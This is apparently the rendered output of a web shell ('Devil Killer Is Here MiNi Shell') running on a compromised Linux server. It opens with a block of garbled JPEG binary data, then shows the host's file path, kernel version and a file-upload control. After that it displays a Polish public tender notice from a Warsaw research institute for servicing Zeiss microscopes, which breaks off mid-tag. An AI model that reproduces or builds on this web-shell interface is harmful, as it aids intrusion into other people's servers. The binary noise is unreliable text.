JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221221/0050906101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kontrakty serwisowe dla systemów mikroskopowych Zeiss posiadanych przez Zamawiającego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT BIOLOGII DOŚWIADCZALNEJ IM. MARCELEGO NENCKIEGO POLSKIEJ AKADEMII NAUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000325825</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ludwika Pasteura 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-093</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@nencki.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nencki.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> naukowo-badawcza i edukacyjna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kontrakty serwisowe dla systemów mikroskopowych Zeiss posiadanych przez Zamawiającego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8fa557ee-8109-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00509061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010975/31/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Kontrakty serwisowe dla systemów mikroskopowych Zeiss posiadanych przez Zamawiającego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie podmiotowych środków dowodowych (o ile są wymagane) innych dokumentów, oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji -odbywa się za pośrednictwem poczty elektronicznej, e-mail Zamawiającego: przetargi@nencki.edu.pl .<br/>Składanie ofert odbywa się za pośrednictwem miniPortalu, adres: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty elektroniczne, składane są przez Wykonawcę za pomocą poczty elektronicznej jako załączniki, na wskazany adres email. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>1)Wykonawca przekazuje korespondencję na adres email Zamawiającego: przetargi@nencki.edu.pl; <br/>2)Zamawiający przekazuje korespondencję na adres email Wykonawcy wskazany w oświadczeniu/wniosku (dotyczy korespondencji przekazywanej przed czynnością otwarcia ofert), po otwarciu ofert na adres e-mail wskazany przez Wykonawcę &#34;do korespondencji&#34; w Ofercie;<br/>3) w tytule wiadomości mailowej należy podać numer/oznaczenie postępowania: AZP-261-63/2022.<br/>Za termin przekazania korespondencji, tj. wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się termin ich wysłania na adresy e-mail: przetargi@nencki.edu.pl.<br/>Wyjaśnienia, modyfikacje treści SWZ i inne informacje proceduralne Zamawiający zamieszcza na stronie internetowej prowadzonego postępowania (https://miniportal.uzp.gov.pl/).<br/>Powyższe informacje nie dotyczą sposobu złożenia Oferty, który został opisany w Rozdziale VII SWZ - Złożenie oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DOTYCZĄCA PRZETWARZANIA DANYCH<br/>OSOBOWYCH zamieszczona została w ROZDZIALE II SWZ (specyfikacji warunków zamówienia) dla tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZP-261-63/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa serwisowania obejmująca niżej wymienione systemy mikroskopowe wraz z oprogramowaniem, stacjami komputerowymi i wszystkimi elementami niezbędnymi do zapewnienia pełnej funkcjonalności mikroskopów obejmującymi również podstawy antywibracyjne i stoły, na których umieszczone są mikroskopy (dalej: usługa serwisowa).<br/>Systemy mikroskopowe dotyczą następujących mikroskopów:<br/>	mikroskop konfokalny LSM 800 o numerze seryjnym #2634000158 firmy Carl Zeiss,<br/>	mikroskop konfokalny LSM 780 o numerze seryjnym #2504000345 firmy Carl Zeiss,<br/>	mikroskop Axio Observer.Z1 z systemem TIRF #3834002000 firmy Carl Zeiss, <br/>	mikroskop Cell Observer Spinning Disk (SD) o numerze seryjnym #3851000152 firmy Carl Zeiss wraz z całym systemem zawierającym mikroskop, zestaw laserów, głowice SD oraz dwie kamery,<br/>	mikroskop elektronowy SIGMA VP o numerze seryjnym #02.79 z wyłączeniem komponentów 3View firmy Gatan<br/>	mikroskop LSM 7 MP ‘InVivo’ oparty na statywie górnym mikroskopu Axio Examiner.Z1 o numerze seryjnym #3345000474 z wyłączeniem laserów Chameleon firmy Coherent<br/>	mikroskop LSM 7 MP ‘Photomaniuplation’ oparty na statywie górnym mikroskopu Axio Examiner.Z1 o numerze seryjnym #3345000476 z wyłączeniem laserów Coherent Chameleon<br/><br/><br/>Wymagania dotyczące sposobu realizacji przedmiotu zamówienia:<br/>1.	co najmniej dwa przeglądy techniczne w ciągu 18 miesięcy (od momentu udzielenia zamówienia) dla każdego z wymienionych systemów.<br/>2.	Nielimitowaną liczbę napraw i wizyt diagnostycznych wyżej wymienionych systemów, bez ograniczeń czasowych z uwzględnieniem kosztów przejazdu i pobytu serwisanta.<br/>3.	Rozpoczęcie czynności serwisowych (czas reagowania) licząc od zgłoszenia (maksymalnie 7 dni roboczych od daty otrzymania zgłoszenia usterki; Oferty proponujące dłuższy czas reagowania od wskazanego zostaną odrzucone. Wykonawcy mogą zaproponować w ofertach krótszy czas reagowania. Zaoferowanie krótszego czasu reagowania jednym z kryteriów oceny ofert.<br/>4.	Czas naprawy - 14 dni roboczych od daty otrzymania zgłoszenia usterki, a w przypadku konieczności zamówienia (importu) części serwisowych z magazynu producenta (maksymalnie 21 dni roboczych od daty otrzymania zgłoszenia usterki).<br/>5.	Stały rabat na części serwisowe, materiały eksploatacyjne i aktualizacje oprogramowania od cen katalogowych (minimum 3%).<br/>6.	Wsparcie w organizacji sesji zdalnej (poprzez połączenie za pomocą internetu) z serwisem producenta. Wymagane jest podanie telefonu, adresu email i identyfikatora w oprogramowaniu do obsługi zdalnej, z wykorzystaniem których można realizować zdalne wsparcie.<br/>7.	Wsparcie w przeprowadzaniu czynności serwisowych, konserwacyjnych i szkoleniowych (jak np. szkolenie z oprogramowania i obsługi mikroskopu, konfiguracja oprogramowania, adjustacja optycznych ścieżek wzbudzenia, emisji i detekcji dla różnych kanałów zbierania sygnału, uzgadnianie przestrzenne obrazów uzyskanych w różnych kanałach spektralnych, konsultacja schematów optycznych wymienionych systemów, przemieszczenie systemu mikroskopowego, diagnostyka zdalna, aktualizacja oprogramowania na stacjach komputerowych służących do analizy danych otrzymanych na wymienionych mikroskopach oraz kontrolujących pracę wymienionych mikroskopów itp.) w ciągu 18 miesięcy obowiązywania umowy (lub dłużej jeśli zaoferowano) w sposób uzgodniony między Zamawiającym a Wykonawcą.<br/>8.	Potwierdzanie każdej wizyty serwisowej raportem serwisowym podpisanym przez osobę wyznaczoną do kontaktu ze strony Zamawiającego.<br/>9.	Umieszczenie wyników wykonanej diagnostyki w folderze serwisowym na dysku twardym komputera połączonego z danym systemem mikroskopowym, w celu umożliwienia śledzenia zmian parametrów systemu w czasie.<br/>10.	Dostęp realizowany przez sieć internet do portalu serwisowego, pozwalającego na tworzenie zgłoszeń serwisowych dla każdego z serwisowanych systemów mikroskopowych, śledzenie postępu ich realizacji oraz zdalną diagnostykę i konserwację zapobiegawczą. Możliwe jest zaoferowanie zdalnej konserwacji zapobiegawczej tylko dla nowszych systemów, produkowanych nie wcześniej niż w 2015 roku. <br/>11.	Udzielenie gwarancji na części serwisowe trwającej co najmniej 6 miesięcy.<br/>12.	Czas trwania usługi serwisowej co najmniej 18 miesięcy. Oferty proponujące krótszy okres usługi serwisowania od wskazanego zostaną odrzucone. Wykonawcy mogą zaproponować w ofertach dłuższy okres usługi serwisowania. Zaoferowanie dłuższego okresu usługi serwisowania jest jednym z kryteriów oceny ofert.<br/><br/>Informacje przydatne przy sporządzaniu oferty<br/>Zamawiający przewiduje, na zrealizowanie przedmiotu zamówienia, w ciągu trwania umowy, przeznaczyć, tytułem wynagrodzenia dla wykonawcy maksymalnie kwotę do 720 000,00 zł brutto. Wynagrodzenie za usługi serwisowe jest wynagrodzeniem ryczałtowym, obejmujących wszelkie czynności niezbędne do prawidłowego wykonania przedmiotu zamówienia (m.in. wartość usługi z podatkiem VAT), nawet jeśli czynności te nie zostały wprost wyszczególnione w treści umowy. Podana kwota maksymalna - 720 000,00 zł brutto, obejmuje koszt serwisu pogwarancyjnego oraz szacowany koszt części serwisowych, materiałów eksploatacyjnych i aktualizacji oprogramowania dla serwisowanych systemów. Przy ocenie oferty, zgodnie z kryteriami określonymi w Rozdziale XIV, będzie brany pod uwagę koszt serwisu pogwarancyjnego (usługi serwisowej) bez opcjonalnego kosztu części serwisowych, materiałów eksploatacyjnych i aktualizacji oprogramowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta podlega odrzuceniu zgodnie z zasadami określonymi w art. 226 ust. 1 Pzp.<br/>Oferty nieodrzucone będą oceniane według kryteriów opisanych w Rozdziale XIV SWZ.<br/>Stosowanie matematycznych obliczeń stanowi zasadę przy ocenie ofert. Waga danego kryterium równa się maksymalnej liczbie<br/>punktów możliwych do uzyskania w tym kryterium. Punktacja obliczana jest w zaokrągleniu do setnych części punktu. Wybór oferty<br/>dokonany zostanie na podstawie opisanych wzorów i zasad opisanych w Rozdziale XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis Pogwarancyjny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reagowania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wyznacza warunek udziału w zakresie wskazanym w art. 112 ust. 2 pkt. 4 Pzp (zdolności zawodowe), w związku z art. 116 Pzp, dotyczący kwalifikacji zawodowych osób skierowanych do realizacji zamówienia.<br/>Określenie warunku: Wykonawca musi wykazać, że dysponuje i skieruje do realizacji usługi, będącej przedmiotem zamówienia co najmniej jedną (1) osobą posiadającą kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia tj. posiadającą co najmniej 2 letnie doświadczenie zawodowe oraz imienny certyfikat/zaświadczenie, potwierdzający przeszkolenie przez producenta lub autoryzowanego przedstawiciela producenta z obsługi serwisowej mikroskopu tego samego rodzaju, który będzie przedmiotem usługi serwisowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający informuje, iż w niniejszym postępowaniu przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień ich złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia: Oświadczenia o aktualności informacji, zawartych w złożonym wraz z Ofertą Oświadczeniu wstępnym, o którym mowa w art. 125 ust 1 Pzp, zwane dalej „Oświadczeniem o aktualności”. Wzór oświadczenia stanowi załącznik do SWZ.<br/>	Wykonawca polegający na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Pzp, składa powyższe „Oświadczenie o aktualności” złożone przez podmiot udostępniający zasoby.<br/>	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o aktualności informacji, obowiązuje oddzielnie każdego z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający informuje, iż w niniejszym postępowaniu przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień ich złożenia podmiotowych środków dowodowych na potwierdzenie spełnienia postawionych w postępowaniu warunków udziału dotyczących:<br/>zdolności zawodowej: dotyczy kwalifikacji zawodowych osób skierowanych do realizacji zamówienia (art. 112 ust. 2 pkt 4 w zw. z art. 116 Pzp): <br/>-	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych (w tym imienny certyfikat/zaświadczenie, potwierdzający przeszkolenie przez producenta lub autoryzowanego przedstawiciela producenta z obsługi serwisowej mikroskopu tego samego rodzaju, który będzie przedmiotem usługi serwisowej) oraz doświadczenia (zawodowego) niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami na wzorze wykazu stanowiącego załącznik do SWZ – Wykaz osób.<br/>-	informacje w tym wykazie muszą potwierdzać, że osoba skierowana do realizacji zamówienia spełnia wymagania określone w rozdziale IV ust. 2 pkt 1.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składa w terminie składania ofert następujące dokumenty/oświadczenia:<br/>1)	Oświadczenie wstępne o nie podleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu z art 125 ust. 1 Pzp, aktualne na dzień składania ofert w zakresie wskazanym przez Zamawiającego w niniejszej specyfikacji (wzór stanowi załącznik do SWZ - Oświadczenie z art. 125 ust. 1 Pzp). <br/>a)	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania warunku udziału w postępowaniu w zakresie, w jakim powołuje się na ich zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby (podmiot trzeci składa odrębne Oświadczenie wstępne); <br/>b)	w przypadku wspólnego ubiegania się o zamówienie przez wykonawców Oświadczenie wstępne składa każdy z Wykonawców ubiegających się o zamówienie, przy czym oświadczenie potwierdza spełnienie warunku udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wskazuje spełnienie warunku udziału w postępowaniu i brak podstaw wykluczenia. <br/>c)	Zamawiający informuje, że nie określa szczególnego sposobu spełniania warunków realizacji zamówienia przez takich Wykonawców w inny sposób niż w przypadku pojedynczego Wykonawcy.<br/><br/><br/>Oświadczenia/ dokumenty stanowiące treść oferty:<br/><br/>2)	Formularz oferty (wzór stanowi załącznik do SWZ- Oferta). <br/>3)	Informacja o powierzeniu/nie powierzeniu części zamówienia podwykonawcom (wzór stanowi załącznik do SWZ - Informacja o podwykonawcach).<br/>4)	Zobowiązanie podmiotu trzeciego albo inny dokument, potwierdzający udostępnienie dla Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia potwierdzający w swej treści, że określony w art. 118 Pzp potencjał został faktycznie udostępniony (wzór stanowi załącznik do SWZ – Zobowiązanie podmiotu trzeciego) - składane o ile dotyczy.<br/>5)	Oświadczenie o podziale zadań pomiędzy konsorcjantów, z którego wynika które usługi/prace wykonają poszczególni wykonawcy, dotyczy przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o zamówienie (wzór stanowi załącznik do SWZ - Oświadczenie konsorcjantów) - składane o ile dotyczy. <br/>6)	Informacja o złożeniu oferty, której wybór prowadzi/ nie prowadzi do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług (wzór stanowi załącznik do SWZ – Informacja o podatku) - składana o ile dotyczy. <br/>7)	Informacja o zastrzeżeniu jawności treści stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (wzór stanowi załącznik do SWZ – Informacja o utajnieniu) -składana o ile dotyczy. <br/>8)	Pełnomocnictwo, w przypadku, gdy Oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 58 ust. 2 Pzp - składane o ile dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 